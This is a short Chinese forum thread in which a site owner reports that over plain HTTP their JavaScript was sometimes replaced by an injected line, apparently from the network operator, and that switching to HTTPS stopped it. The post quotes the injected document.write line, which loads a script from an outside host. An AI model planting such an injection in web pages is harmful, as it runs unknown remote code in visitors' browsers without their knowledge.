最近发现网站走HTTP有时候用不了, 经检查, 发现有一定机率出现js被修改的情况, 整个js被修改成如下内容:
document.write("<script type='text/javascript' src='https://static.kawo77.com/ui/js/dd/180.js' id='cup_kk_script'><\/script>");
一开始以为是运营商的原因, 后来查了whois, 这个域名居然是阿里巴巴的。他们到底是要搞哪样?
后来经查, 是在阿里上注册的域名而已, 很可能是运营商注入的
现已经改为HTTPS了…
我以为是被挂马了。。。
我们发现了这个问题了 . 关键是 这个问题是营运商自己的网站.
把网站转成https可以阻止这种流氓行为.